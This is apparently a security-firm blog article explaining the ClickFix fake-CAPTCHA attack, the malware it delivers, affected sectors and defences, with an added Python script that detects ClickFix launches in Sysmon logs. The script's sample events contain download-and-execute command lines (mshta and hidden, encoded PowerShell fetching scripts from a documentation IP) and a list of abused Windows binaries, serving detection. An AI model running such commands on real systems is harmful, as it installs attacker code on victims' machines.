Threatonomics

Understanding the ClickFix attack

by Emma McGowan, Senior Writer

How three keystrokes can lead to malware infection

Imagine a cyberattack so simple yet so deceptive that all it takes is three keystrokes to compromise your system. This is the reality of the ClickFix attack, a threat that Resilience threat researchers have observed in the wild since 2024 and that seems to be ramping up in recent weeks. ClickFix tricks users into running a malicious command themselves, under the guise of a routine bot-verification check. Originally used in targeted attacks, the technique has rapidly gained traction and now poses a significant risk to a much broader audience.

At first glance, ClickFix appears harmless—just another “Verify You Are a Human” CAPTCHA-like prompt. However, beneath this familiar facade lies a dangerous trick: users are guided through three seemingly benign keystrokes that ultimately lead to malware installation. 

This attack preys on human behavior, exploiting trust in common online interactions to deploy password-stealing malware (aka infostealers), remote access trojans (RATs), and other malicious payloads. With cybercriminals refining their tactics to maximize efficiency and deception, understanding the mechanics of ClickFix is critical to preventing its spread.

How the ClickFix attack works

ClickFix thrives on social engineering, manipulating users into unwittingly executing malicious commands. This attack preys on the human tendency to solve a perceived problem quickly, especially when faced with urgent or authoritative prompts. Because the victim types the command into a legitimate Windows dialog and it runs under the victim's own account through a signed Windows binary, there is no malicious attachment, exploit, or unsigned download for an email gateway or browser download scanner to catch; security tools that look for self-executing malware see nothing until the pasted command itself starts running.

The attack typically begins with a deceptive pop-up on a compromised or malicious website. This pop-up mimics a standard bot verification message, often displaying an “I’m not a robot” checkbox. When the user clicks it, the page’s script quietly places the attacker’s command on the system clipboard, and the user is then prompted to complete three simple steps to confirm they are human.

The first step instructs users to press the Windows Key + R simultaneously. This shortcut opens the Run dialog box, a legitimate Windows feature that allows users to execute commands and programs quickly.

Next, users are told to press CTRL + V, which pastes the command the website copied to the clipboard into the Run prompt. Because the copy happened without any visible prompt, users typically do not realize that what they are pasting came from the website rather than from something they chose to copy.

Finally, pressing Enter executes the pasted command. In the variant described here, that command invokes mshta.exe, a signed Windows utility that runs Microsoft HTML Application (.hta) files, with a remote URL; mshta fetches and runs the attacker’s script, which in turn downloads and launches the malware. Other variants invoke PowerShell directly. Either way, this step compromises the device, and the malware installs under the logged-in user’s account.

What malware does ClickFix deliver?

ClickFix has been linked to several well-known malware families, including:

  • XWorm
  • Lumma stealer
  • VenomRAT
  • AsyncRAT
  • Danabot
  • NetSupport RAT

The intermediate stages vary, commonly PowerShell scripts, JavaScript, or portable executable (PE) files, but the end goal is the same: these malware families are designed to steal financial credentials and saved passwords, log keystrokes, and grant remote attackers full control over an infected device.

Examples of ClickFix in the wild

ClickFix quickly expanded beyond its initial targeted attacks and now affects a range of industries and individuals. Cybercriminals use phishing emails, compromised websites, and social engineering tactics to deploy this attack across different sectors. While any internet user could potentially fall victim to ClickFix, specific industries have been disproportionately targeted due to their reliance on online communications and digital workflows.

Hospitality

A phishing campaign impersonating Booking.com has been leveraging ClickFix to target hospitality organizations. Fraudulent emails reference negative guest reviews, booking requests, or promotional opportunities to lure recipients into clicking malicious links. Microsoft attributes the campaign to a threat actor it tracks as Storm-1865, noting that the campaign has been active since at least December 2024.

Healthcare

Cybersecurity firm Arctic Wolf has observed ClickFix attacks targeting healthcare professionals. One notable instance involved malicious code injected into the HEP2go physical therapy video site, redirecting users to ClickFix prompts.

Car dealerships

In March 2025, DarkReading reported on a ClickFix attack targeting car dealerships. More than 100 automotive industry websites were infected through a shared third-party component, the video streaming service LES Automotive, so that a single compromised vendor put the ClickFix prompt in front of visitors to every dealership site that embedded it. It was the second major attack on an auto industry third-party vendor in less than a year, following the June 2024 ransomware attack on CDK Global.

General public

According to the U.S. Department of Health and Human Services, ClickFix has extensive reach and has appeared in many services used by the general public. Variants of this attack have been observed in:

  • Fake Google Chrome error pages
  • Pop-ups spoofing Facebook login pages
  • Impersonations of PDFSimpli and reCAPTCHA
  • Instances invoking PowerShell scripts from remote websites

How to protect yourself (and your organization) against ClickFix

Because ClickFix relies on social engineering, the first line of defense is employee education, backed by technical controls that make the pasted command fail or at least leave a trace. Security training should include guidance on how to recognize a phishing scheme, reinforced by regular simulated phishing exercises run by your IT or security team. With that in mind, here are some best practices to defend against the phishing that delivers ClickFix:

  • Educate employees on how to recognize phishing scams.
  • Warn employees that no legitimate website or CAPTCHA will ever ask them to press key combinations or paste text into a Windows dialog.
  • Encourage checking the sender’s email address carefully before taking action.
  • Advise contacting service providers directly to verify suspicious messages.
  • Caution against responding to emails with urgent calls to action.
  • Instruct employees to hover over links to inspect the full URL before clicking.
  • Teach employees to look for typos and subtle misspellings in emails and URLs.

On the technical side, a few controls cut off the chain described above:

  • Disable the Run dialog for users who do not need it; the Group Policy setting “Remove Run menu from Start Menu” also disables Windows Key + R.
  • Block or restrict mshta.exe and other script hosts with AppLocker or Windows Defender Application Control, and enable Microsoft Defender attack surface reduction rules where Defender is deployed.
  • Alert on explorer.exe spawning mshta.exe, powershell.exe, or cmd.exe with a URL or an encoded command on the command line; that parent-child pair is what a pasted Run-dialog command looks like in process telemetry.
  • When investigating a suspected infection, check the user’s Run history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which retains the pasted command after the pop-up is long gone.
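The detection side of the chain described under “How the ClickFix attack works”, as an added example that is not code from the original article or from Resilience: a Python script that scans Sysmon process-creation (Event ID 1) records for the trace the three keystrokes leave behind. A command pasted into the Run dialog runs as a child process of explorer.exe, so the rule flags explorer.exe spawning a script host or download utility whose command line carries a remote URL, a hidden window, or a base64 -EncodedCommand, and decodes the latter so the analyst sees the URL it conceals. The four sample events, the user name, and the 198.51.100.7 address are constructed for the example; the field names follow Sysmon’s schema.

```python
"""Flag ClickFix-style launches in Sysmon Event ID 1 (process creation) records.

Added example, not code from the original article or from Resilience.
Assumptions: records are JSON objects using Sysmon field names (Image,
ParentImage, CommandLine, User); the sample events below are constructed.
"""
import base64
import json
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Signed Windows binaries that ClickFix lures tell the victim to run from Win+R.
LOLBINS = {
    "mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "curl.exe",
    "certutil.exe", "bitsadmin.exe", "wscript.exe", "cscript.exe",
}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; the value is
# base64 of a UTF-16LE string.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.IGNORECASE)


@dataclass
class Finding:
    record_id: str
    user: str
    image: str
    command_line: str
    reasons: List[str] = field(default_factory=list)
    decoded: Optional[str] = None


def basename(path: str) -> str:
    """Last path component, lower-cased, for Windows or POSIX separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand argument, or None if absent/invalid."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev: dict) -> Optional[Finding]:
    """Flag a process-creation record if it looks like a pasted ClickFix command."""
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    # The Run dialog is hosted by explorer.exe, so the pasted command's process
    # has explorer.exe as its parent. Consoles, scripts and schedulers do not.
    if image not in LOLBINS or parent != "explorer.exe":
        return None
    decoded = decode_encoded_command(cmd)
    # Search the decoded payload too, so a URL hidden inside -enc is not missed.
    searchable = cmd if decoded is None else f"{cmd}\n{decoded}"
    reasons = []
    if URL_RE.search(searchable):
        reasons.append("fetches a remote URL")
    if decoded is not None:
        reasons.append("base64 -EncodedCommand (decoded)")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden window")
    if not reasons:
        return None  # a user simply opening PowerShell or cmd from Win+R
    if image == "mshta.exe":
        reasons.append("mshta.exe used as the launcher")
    return Finding(ev.get("RecordId", "?"), ev.get("User", "?"), image, cmd, reasons, decoded)


def scan(jsonl_lines) -> List[Finding]:
    """Run score_event over JSON-lines records and keep the hits."""
    hits = (score_event(json.loads(line)) for line in jsonl_lines)
    return [f for f in hits if f is not None]


# --- constructed sample events (not real telemetry) --------------------------
# 198.51.100.7 is an RFC 5737 documentation address; the user and hosts are invented.
ENC_PAYLOAD = "iwr http://198.51.100.7/verify.ps1 | iex"
ENC_B64 = base64.b64encode(ENC_PAYLOAD.encode("utf-16-le")).decode("ascii")
EXPLORER = "C:\\Windows\\explorer.exe"
SYS32 = "C:\\Windows\\System32\\"
PWSH = SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe"


def _event(record_id, image, parent, cmd, user="CORP\\jdoe"):
    return json.dumps({"RecordId": record_id, "User": user, "Image": image,
                       "ParentImage": parent, "CommandLine": cmd})


SAMPLE_SYSMON_JSONL = [
    # 1: the article's variant: mshta pulling a remote HTA straight from the Run dialog
    _event("1", SYS32 + "mshta.exe", EXPLORER, "mshta https://198.51.100.7/verify.hta"),
    # 2: PowerShell variant, window hidden, URL concealed inside an encoded command
    _event("2", PWSH, EXPLORER, f"powershell -w hidden -enc {ENC_B64}"),
    # 3: benign: an administrator opened PowerShell from Win+R with no arguments
    _event("3", PWSH, EXPLORER, "powershell"),
    # 4: same download, but launched by a batch script: outside this rule's scope
    _event("4", PWSH, SYS32 + "cmd.exe", "powershell -c \"iwr https://198.51.100.7/update.ps1 | iex\""),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_SYSMON_JSONL):
        print(f"record {f.record_id} user={f.user} image={f.image}: {', '.join(f.reasons)}")
        if f.decoded:
            print(f"  decoded: {f.decoded}")
```

Run as-is, the script reports records 1 and 2 and prints the decoded download command behind record 2; record 3 is a normal interactive launch and record 4, while suspicious, did not come through the Run dialog and belongs to a different rule. The same logic ports directly to a SIEM query keyed on ParentImage, Image and CommandLine.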

The ClickFix attack is a reminder that cyber threats continue to evolve, finding new ways to bypass traditional security measures. Even seemingly innocuous actions—like pressing a few keys—can lead to real consequences if people are tricked into running malicious code.

Vigilance and skepticism are critical defenses against these attacks. Organizations and individuals must educate themselves on emerging threats, implement strong security protocols, and stay ahead of cybercriminal tactics.
